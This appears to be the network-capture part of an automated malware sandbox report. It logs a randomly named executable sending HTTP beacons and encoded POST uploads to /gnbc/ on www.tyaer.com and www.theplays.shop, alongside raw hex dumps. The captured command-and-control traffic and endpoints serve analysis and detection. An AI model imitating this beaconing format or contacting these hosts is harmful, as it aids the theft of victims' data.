                                          Data Ascii: rb^,\lL';$x?p;sRhi[$d*ZWatI%1P!~fn!!8BG9M3uog=f6Q^0n27Uc6zA}le_3_lw`"(~4r9tXZrR`eD)
                                          Apr 24, 2024 11:57:21.172677994 CEST1289INData Raw: db be 36 1e 60 44 a3 b9 bf 78 a5 b7 07 03 6b 4c 65 8f 83 d9 4b e3 07 4d 83 80 c9 12 9a da 8f 6b 27 20 03 76 7a 1d 39 e1 1e ea 62 cd 25 b4 60 d1 b3 64 00 a4 21 ca 19 3f ad 39 35 60 e4 e9 23 a6 be f4 e1 ba 89 6f 13 f1 e0 49 5c f0 15 25 ff b5 00 5a
                                          Data Ascii: 6`DxkLeKMk' vz9b%`d!?95`#oI\%ZWK4.T?d(@)?X7A(ZGH.\s1Qf3XsN*7icEe@G*QM}pEMX`J&GC78%]D6s
                                          Apr 24, 2024 11:57:21.172734022 CEST1289INData Raw: 03 41 d4 58 8d 60 86 da eb 7f 46 de 77 cc d1 74 29 91 b2 ac 11 de 4e 42 75 a9 06 51 54 9a 58 85 4b 18 90 3b 16 11 cc ce 45 dd c8 3c 6a 7f ed f9 52 0b 77 c1 c5 e3 00 d5 f9 58 33 0f 96 95 29 27 b2 b2 35 d8 8c 57 b1 4b 2d 1f 1b 41 c0 6d 92 87 33 bf
                                          Data Ascii: AX`Fwt)NBuQTXK;E<jRwX3)'5WK-Am3fs,{XtbG?TbhjLT"x?P8a`b]e/CKep;P:[&Tp_!a+&SY^b[JgY8b%:x;%0]1
                                          Apr 24, 2024 11:57:21.172789097 CEST1289INData Raw: 70 f3 fc 4f 9b da b5 af 5f 10 29 ea 48 92 cc 0b 5f 9f 63 a4 2c 6b db 53 3a e6 84 e9 af bb 04 8e 5b e3 d6 a4 46 79 eb 4c 5f 79 c1 c9 5b cb ec d9 f9 d0 a3 db 07 a3 4f 5b 3b ed 08 19 7f ef 6a ba fe b5 1d 20 68 c5 81 3a 7e 42 ef 78 bb f5 23 4e 84 e4
                                          Data Ascii: pO_)H_c,kS:[FyL_y[O[;j h:~Bx#N%~Jmk Oh&0{YkXhKI69` ?Un_t:Ag@t+ ;+4Su1x$LNx[;W;"m
                                          Apr 24, 2024 11:57:21.172844887 CEST1289INData Raw: e6 3c 3d 11 6b 56 74 bb 34 9e b4 8b 64 be 4a f2 ee a6 72 35 8c 95 80 43 1b 4b 28 b1 cd 6c 98 6f ac 07 ae 01 75 7f 2d 52 40 88 dd 30 55 70 4f 35 e6 80 70 a0 44 28 86 ed 1a ef c5 7c 33 97 ab a8 af 1a ed fd a1 7f 12 0d f9 56 4e b5 f0 43 5e 58 f9 0e
                                          Data Ascii: <=kVt4dJr5CK(lou-R@0UpO5pD(|3VNC^Xg(Qw$-E`;P`D}a@n?=(TVr"JL*(PVv#]cMg9dVuY2p@4v~zB|#E0 y,Zoh2[K7eV
                                          Apr 24, 2024 11:57:21.477813959 CEST1289INData Raw: c7 5b f5 e1 23 9a 05 b9 7a 9a 21 d1 df 50 f6 fe 34 12 5e 38 d2 fd 61 57 2c 48 e2 eb b3 2d 48 e1 10 5b c4 9c 9e d2 0b 3c 00 e4 a9 ad d1 97 32 f7 d0 6b 08 6c fc d4 b7 00 c9 91 3a 9f f1 87 46 c1 7e 36 47 06 03 16 e6 91 13 2a 73 e1 35 34 b0 89 84 58
                                          Data Ascii: [#z!P4^8aW,H-H[<2kl:F~6G*s54X:hQAu.,XN[42i&rT;(D96< T%\:EnY5qi(|nc8|4gJF('HNNz=~$3nHox%2H}X


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.11.205031647.91.88.207807072C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe
                                          TimestampBytes transferredDirectionData
                                          Apr 24, 2024 11:57:58.501990080 CEST530OUTGET /gnbc/?3rIdN=L9JeOsoYfW7LuiHbEV4XUwbpY14lK3MC8gDNcZo86ZNgoJ0Ky4PaH7DNod07P46PC5yTK57EcxKk26T8ts7dMYkzgYfCCfwx/idEgCEytip/UDtQtUPltR4=&-vl=m8zDpnb8Q0wTDj9 HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-US,en
                                          Connection: close
                                          Host: www.tyaer.com
                                          User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Apr 24, 2024 11:57:58.838705063 CEST1254INHTTP/1.1 404 Not Found
                                          Server: nginx/1.20.1
                                          Date: Wed, 24 Apr 2024 09:57:58 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          X-Trace: 2B2C9B66440431D77EAAC586823BF5FDFE2BB634217B5550DC29F3FFC500
                                          Set-Cookie: _csrf=80c89093c88a4c32d4195643ece835d950e572e10e781462568b16bdb938eaefa%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22Y6jq5p23SqM48dU5y16ucWtW9H-p7Hrq%22%3B%7D; path=/; HttpOnly
                                          Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 59 78 50 53 52 4d 66 50 4a 48 6a 31 53 67 6a 50 72 35 6f 4d 47 58 6c 66 35 61 77 6f 49 41 62 51 45 30 6e 56 2d 71 5f 64 70 61 67 36 4a 62 67 31 38 72 38 57 53 36 59 37 52 66 75 58 5f 6c 6b 73 41 47 37 54 32 55 74 33 63 6f 63 71 41 66 69 4b 6d 4a 58 58 32 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="YxPSRMfPJHj1SgjPr5oMGXlf5awoIAbQE0nV-q_dpag6Jbg18r8WS6Y7RfuX_lksAG7T2Ut3cocqAfiKmJXX2Q=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></body></html>0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.11.2050319172.67.152.117807072C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe
                                          TimestampBytes transferredDirectionData
                                          Apr 24, 2024 11:58:46.928009987 CEST792OUTPOST /gnbc/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Encoding: gzip, deflate
                                          Accept-Language: en-US,en
                                          Content-Type: application/x-www-form-urlencoded
                                          Connection: close
                                          Content-Length: 202
                                          Cache-Control: no-cache
                                          Host: www.theplays.shop
                                          Origin: http://www.theplays.shop
                                          Referer: http://www.theplays.shop/gnbc/
                                          User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 33 72 49 64 4e 3d 50 48 6f 65 45 53 6c 53 62 5a 64 4c 6c 4d 4b 53 68 4b 4b 35 54 67 5a 78 34 35 72 41 6d 4d 4c 54 2b 49 38 48 6c 38 30 36 72 48 2b 52 67 7a 62 68 6e 6e 31 53 2b 54 37 4b 43 69 43 37 41 72 74 2f 69 35 6e 56 32 75 75 6c 67 38 50 38 66 58 74 36 32 4d 63 57 71 71 57 6e 43 78 6a 76 6f 53 48 39 78 79 2f 4f 70 52 65 57 31 63 49 79 4b 30 66 74 54 79 4a 4f 32 41 78 44 70 75 6f 4c 33 2f 57 7a 2f 67 51 55 61 66 71 75 74 65 36 75 6c 37 71 42 5a 33 76 30 33 55 49 2f 41 4f 65 61 4d 75 6c 59 44 6f 67 64 61 4a 2f 78 55 79 77 72 54 75 44 34 77 55 33 2b 50 55 33 6e 51 4e 70 75 74 79 44 71 2b 77 3d 3d
                                          Data Ascii: 3rIdN=PHoeESlSbZdLlMKShKK5TgZx45rAmMLT+I8Hl806rH+Rgzbhnn1S+T7KCiC7Art/i5nV2uulg8P8fXt62McWqqWnCxjvoSH9xy/OpReW1cIyK0ftTyJO2AxDpuoL3/Wz/gQUafqute6ul7qBZ3v03UI/AOeaMulYDogdaJ/xUywrTuD4wU3+PU3nQNputyDq+w==
                                          Apr 24, 2024 11:58:47.409538031 CEST709INHTTP/1.1 404 Not Found
                                          Date: Wed, 24 Apr 2024 09:58:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TGdQO6pq1G0TCdW2aoD9dlOTDesVWCM%2FMvz3lfDwOn5TCuDZshM4E8zhzaVZyvSCyWXYsihjLbQIL4aEZLoFhuT6jZisHObQxj5BwXu9%2FEGfm9kmOFHHUKUTQ9FPkCRZgjuUVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 87953c9fce98525d-LAX
                                          Content-Encoding: gzip
                                          alt-svc: h3=":443"; ma=86400
                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                          Apr 24, 2024 11:58:47.409615040 CEST5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.11.2050320172.67.152.117807072C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe
                                          TimestampBytes transferredDirectionData
                                          Apr 24, 2024 11:58:49.607287884 CEST1132OUTPOST /gnbc/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Encoding: gzip, deflate
                                          Accept-Language: en-US,en
                                          Content-Type: application/x-www-form-urlencoded
                                          Connection: close
                                          Content-Length: 542
                                          Cache-Control: no-cache
                                          Host: www.theplays.shop
                                          Origin: http://www.theplays.shop
                                          Referer: http://www.theplays.shop/gnbc/
                                          User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 33 72 49 64 4e 3d 50 48 6f 65 45 53 6c 53 62 5a 64 4c 6c 6f 32 53 73 4c 4b 35 43 51 5a 79 39 35 72 41 70 73 4c 58 2b 49 34 48 6c 35 59 55 72 56 71 52 6c 69 72 68 31 6a 68 53 35 54 37 4b 4e 43 43 30 50 4c 74 77 69 35 62 33 32 72 47 6c 67 38 72 38 65 69 78 36 2b 63 63 4a 68 4b 57 6b 4b 52 6a 75 2b 53 48 33 78 79 7a 73 70 51 36 57 31 4d 73 79 4a 32 48 74 45 51 78 50 6e 77 78 42 72 75 6f 4d 39 66 57 68 2f 67 73 63 61 66 54 62 74 74 6d 75 6d 61 4b 42 59 33 76 72 74 55 4a 33 4a 75 66 37 4c 4d 59 31 62 36 64 67 64 71 76 58 4d 43 51 57 5a 64 66 5a 70 79 58 44 51 32 54 6a 51 63 5a 77 74 44 69 6d 2b 6f 54 6a 70 48 33 38 53 4b 77 59 6b 31 65 44 76 72 4e 4b 66 2b 39 61 31 65 50 76 71 47 47 58 31 59 64 2b 31 6e 77 61 30 38 64 2f 51 46 6b 50 74 6d 41 6e 6e 42 75 6a 37 4b 69 2b 35 75 57 69 2f 57 47 43 35 4f 45 34 4d 47 5a 78 71 2b 30 59 72 30 79 79 57 75 36 55 71 33 4f 43 5a 46 70 4b 72 58 35 36 36 65 37 45 44 31 4f 4e 54 75 4f 56 74 54 63 53 6e 49 38 4f 30 6b 2f 35 57 68 55 51 4a 49 36 2b 39 76 33 75 33 67 30 4b 42 76 33 4a 4d 62 4c 6a 56 6e 67 4c 5a 48 2f 37 33 64 69 38 67 63 31 5a 44 53 4f 68 73 6a 43 42 78 41 54 2f 61 2b 38 46 78 79 53 34 76 7a 44 41 37 45 68 66 44 6f 37 4e 6c 38 5a 45 5a 53 4b 2b 32 69 35 44 75 55 74 48 59 37 77 6b 61 34 74 46 75 76 36 4a 41 4f 54 4d 76 34 53 52 36 51 41 4d 70 4a 6a 74 7a 4f 63 65 63 50 33 63 54 51 7a 35 73 6b 38 37 69 45 53 78 74 46 66 2f 37 45 4c 39 32 65 66 62 54 37 69 76 6e 46 39 4c 6a 4e 66 66 4c 53 2f 39 4f 6e 79 30 43 77 47 4f 59 30 37 33 6e 49 64 58 56 55 6b 42 42 34 7a 5a 4f 69 38 51 48 6a 52 43 69 2b 2f 51 32 5a 4a 62 6d 44 38 4d 52 45 58 6f 6c 6f 37 59 35 6b 4d 3d
                                          Data Ascii: 3rIdN=PHoeESlSbZdLlo2SsLK5CQZy95rApsLX+I4Hl5YUrVqRlirh1jhS5T7KNCC0PLtwi5b32rGlg8r8eix6+ccJhKWkKRju+SH3xyzspQ6W1MsyJ2HtEQxPnwxBruoM9fWh/gscafTbttmumaKBY3vrtUJ3Juf7LMY1b6dgdqvXMCQWZdfZpyXDQ2TjQcZwtDim+oTjpH38SKwYk1eDvrNKf+9a1ePvqGGX1Yd+1nwa08d/QFkPtmAnnBuj7Ki+5uWi/WGC5OE4MGZxq+0Yr0yyWu6Uq3OCZFpKrX566e7ED1ONTuOVtTcSnI8O0k/5WhUQJI6+9v3u3g0KBv3JMbLjVngLZH/73di8gc1ZDSOhsjCBxAT/a+8FxyS4vzDA7EhfDo7Nl8ZEZSK+2i5DuUtHY7wka4tFuv6JAOTMv4SR6QAMpJjtzOcecP3cTQz5sk87iESxtFf/7EL92efbT7ivnF9LjNffLS/9Ony0CwGOY073nIdXVUkBB4zZOi8QHjRCi+/Q2ZJbmD8MREXolo7Y5kM=
                                          Apr 24, 2024 11:58:50.095093012 CEST1117INHTTP/1.1 404 Not Found
                                          Date: Wed, 24 Apr 2024 09:58:50 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V29H4UtLu8kzzBDg4SXB1%2Bw4pUe0B%2FYRqX3L5oC8Xd9zdvEJBzgoAtTR96jsadXLI8gha5V3EKNt2avuGc1VIml5Jfrjp68V4y149N13zoGe4y2yyhqQuEeZxkVziFwl7UXHyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 87953cb08b9e7d8f-LAX
                                          Content-Encoding: gzip
                                          alt-svc: h3=":443"; ma=86400
                                          Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a
                                          Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?
                                          Apr 24, 2024 11:58:50.400614977 CEST1289INData Raw: 37 66 66 61 0d 0a 24 5a c7 ce c4 3c 8e 7c 97 bd 7a 01 e7 34 b3 73 90 73 ce b1 6f ce d9 ee 76 b6 9f 7e f1 fd 73 15 08 09 92 c8 2a b2 c8 7f ce fa bf 3f 6f d9 d6 e2 3f ff 53 66 7b f6 af 6e ca 9a 0a fe ce cd bf f3 6c ab 28 e2 7f bb 88 b3 bd 0b d1 e5
                                          Data Ascii: 7ffa$Z<|z4ssov~s*?o?Sf{nl(f[1li)3#WAE0^40R'nZ$TBNaMIW::f[.x"+h+$&)4QRI+'ZP["L]My@6w6`|
                                          Apr 24, 2024 11:58:50.400691986 CEST1289INData Raw: 80 24 97 bd 7f b0 a1 9d 81 75 27 e9 d6 a4 0b 16 04 f3 47 75 31 0f c9 3f 1b fa cd 9d 93 f7 46 a6 ea 96 f9 2f 76 b8 a0 aa 67 ce d5 97 98 f5 c8 f9 e7 84 a4 cc bf 12 d1 e8 4a 2a 46 d7 1c 83 60 9d a6 f2 26 f4 62 da f0 7c e0 b0 78 fe b4 8d 53 4b b7 e6
                                          Data Ascii: $u'Gu1?F/vgJ*F`&b|xSKXr3F _g5`+jGB`%M;k|>,#T15&2k!;?iInJo6wi1qnk]^hz3&Y=gm+P2b[25=
                                          Apr 24, 2024 11:58:50.400753975 CEST1289INData Raw: 13 46 18 d1 53 be 21 2b 3d 60 82 52 92 18 91 bb d3 0f f4 15 14 95 1a 6a ff 82 9c 15 c1 c4 23 c8 e9 4b b6 9d 75 fb f0 06 ee 1d 11 b7 74 eb 66 9b d7 cb df 25 bf 3a 31 7c 33 9d 53 c6 22 3c d2 62 3d 52 44 c4 e6 90 63 4f 76 e1 64 d7 0a fb f7 1d b1 70
                                          Data Ascii: FS!+=`Rj#Kutf%:1|3S"<b=RDcOvdp=<LL9Q=FrrZRqT!"6ntoMetZQzV\]{U1O1Q@Zg*)@GD+af2?~5@@L,*@6M
                                          Apr 24, 2024 11:58:50.400808096 CEST1289INData Raw: fb c2 aa f2 f5 a0 25 5d b5 97 b0 23 7d 56 ce 11 5b b3 0a 1b 70 fb 1a d5 c9 6a ab 38 c3 85 30 67 55 17 dc 40 49 f9 43 e8 be 74 76 cd 24 82 f5 cb af 50 05 07 c4 1d b7 76 e5 a6 c6 9c d3 42 61 ec e6 cb ec df 9f 2f ef c4 93 8a 8d 1e f3 e0 d4 5a 7f f8
                                          Data Ascii: %]#}V[pj80gU@ICtv$PvBa/Z!i<NN0l~T H;1Qe,ti~vGHS+'xZ.jchaa!'tUh|FOT0Vk`++p:V(tEq
                                          Apr 24, 2024 11:58:50.400861025 CEST1289INData Raw: 47 39 7e 84 13 ff be 9a 7b 1c 9a e3 8b d7 e5 04 e4 ce 9e 9f 1f fa 2b 5d 64 ee 1c 2a bc 7f 32 a8 00 71 b4 77 f6 ad 47 0e b2 e7 2d 70 2b ae c6 15 6a 60 e4 85 7d c3 94 f5 98 26 7f 06 e5 e2 85 b4 90 52 40 e8 6c f4 56 bb bb a1 8f b1 df 9f 2d fc 49 32
                                          Data Ascii: G9~{+]d*2qwG-p+j`}&R@lV-I2f/o4#MwstW[8rx,MXfi*:x/9HE:AF!#<!qm!Uvpcdq]sV2`1B!~?Zg7ifJ=~lJ"u'{{o;gfrye
                                          Apr 24, 2024 11:58:50.400913954 CEST1289INData Raw: 6c 2f 90 0f d3 a5 7d b4 5c 89 8e d5 36 ce 1e af 9c 37 e7 f5 e5 bb f2 eb 21 6b 14 89 36 d6 67 cd d9 8a f8 a6 76 9c f4 3d 52 75 d3 ce 92 9b 58 4c ae 71 f0 3e d0 3f fc dc 9d 88 e5 cd 67 eb ab 4c 5e 36 24 d6 34 a9 e6 aa cb 77 7f 10 a2 6c b5 a6 e8 d5
                                          Data Ascii: l/}\67!k6gv=RuXLq>?gL^6$4wl#f0*aFf!`XK4<B}T4JzMpyuD<_!E:\*\Cb0) e=]JKLcxg:EDXp.Wa_z"t2uPx
                                          Apr 24, 2024 11:58:50.400968075 CEST1289INData Raw: 07 89 76 91 cf ee c7 ea c6 4c cf 4b e1 c7 61 aa 97 7d 54 e7 fd f9 12 bb 11 81 ae a0 d9 5e 55 60 1d 24 6a bb a8 f3 46 aa 43 3e bf 2f 9d 42 a1 8d a1 f1 f3 26 56 5c 2b be fd 23 a8 d3 a7 e5 89 58 4d 87 df 6a 74 f2 ce ee 67 f1 08 a1 6e 91 f3 08 ef cf
                                          Data Ascii: vLKa}T^U`$jFC>/B&V\+#XMjtgn2uRJLWNy5/C1a8ix+Uxu^r)fjMp!kz=g`'&kCon}K[)m\!i9$.M?(#w<K$\2#(u
                                          Apr 24, 2024 11:58:50.401024103 CEST1289INData Raw: a3 02 64 40 9b e9 91 f6 a6 79 78 27 1a 1f 41 41 08 0f e0 bf f8 c7 eb 20 24 2d e9 96 ee 35 5f b7 5e b7 5b a2 fa fc cd cb c6 0b e8 76 76 6d aa c2 ae e7 1a f3 fb 1f 83 f2 cc cf 94 e0 3e 18 87 ba 41 95 9a 3f 75 e1 65 c5 4b 89 cf 51 b5 d9 a4 ba f7 f8
                                          Data Ascii: d@yx'AA $-5_^[vvm>A?ueKQi%RmtH*jP;ptE$:)K2E}j?U%5>N:.@-)j_}}I)ojEF7@dut)c>
                                          Apr 24, 2024 11:58:50.401118994 CEST1289INData Raw: 6b a4 fa ba 32 b2 85 86 66 b1 6d 99 74 b8 85 f5 24 a4 fb 2e 60 4e 17 c2 ba a5 cb 98 46 ff 75 a7 40 9e e9 72 9d 58 02 cf f3 b2 0b 7b ad 1a bf ed 0e f8 eb f1 84 d5 3e 71 c2 e8 13 c1 40 80 ed 77 8f 3f 4a 77 f0 25 2b 1c ef 17 cd 8f 0c a2 5d 2d c3 56
                                          Data Ascii: k2fmt$.`NFu@rX{>q@w?Jw%+]-V/iR-@07&aXMYpci*Ie,s1U+;LuO:6>\yAZYq]}]6jc;u-nO#'hJBYln?OT
                                          Apr 24, 2024 11:58:50.401190996 CEST1289INData Raw: 32 48 d6 44 dc e8 79 49 48 a3 f4 4f ab 0f 03 44 24 04 fb 5d b3 56 cc 3b 29 45 bf b0 f3 8d e4 f6 41 b8 f7 99 6c d3 df 81 b5 f0 0e 16 78 fd 50 4f b0 c5 77 88 66 fb 96 fc 24 05 f7 f8 23 8e 1f 4a f1 39 05 6a 0f 1b 87 db dd 95 cf 1b ee 3d 3e ff d4 49
                                          Data Ascii: 2HDyIHOD$]V;)EAlxPOwf$#J9j=>I?TW]>qYw5@ X9v{A0hxi>E&IR#QO?Pkx'ds<3*5k&fJ=Q.a8Jv{?0( x


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.11.2050321172.67.152.117807072C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe
                                          TimestampBytes transferredDirectionData
                                          Apr 24, 2024 11:58:52.295301914 CEST12890OUTPOST /gnbc/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Encoding: gzip, deflate
                                          Accept-Language: en-US,en
                                          Content-Type: application/x-www-form-urlencoded
                                          Connection: close
                                          Content-Length: 52930
                                          Cache-Control: no-cache
                                          Host: www.theplays.shop
                                          Origin: http://www.theplays.shop
                                          Referer: http://www.theplays.shop/gnbc/
